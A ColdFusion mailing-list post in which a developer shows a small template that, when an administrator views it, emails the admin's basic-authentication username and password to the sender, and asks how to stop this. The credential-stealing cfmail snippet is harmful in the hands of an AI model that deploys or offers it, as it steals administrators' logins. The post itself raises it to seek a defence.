Say I'm a developer, but not a not a SysAdmin.
It is too easy for me to get an administrator's username/password like
this, using Win2k basic authorization:
Hey, administrator, I'm troubleshooting a template, would you see if
the test passes?:
<html><body>
Test Passed! Thanks, for checking, administrator!
<cfmail to="[EMAIL PROTECTED]" from="[EMAIL PROTECTED]" subject="Got Root!">
#cgi.auth_user#
#cgi.auth_password#
</cfmail>
</body></html>
How do I prevent this from working?
Thanks,
Jamie
------------------------------------------------------------------------------------------------
Archives: http://www.mail-archive.com/[email protected]/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebarRsts or send a message with
'unsubscribe' in the body to [EMAIL PROTECTED]
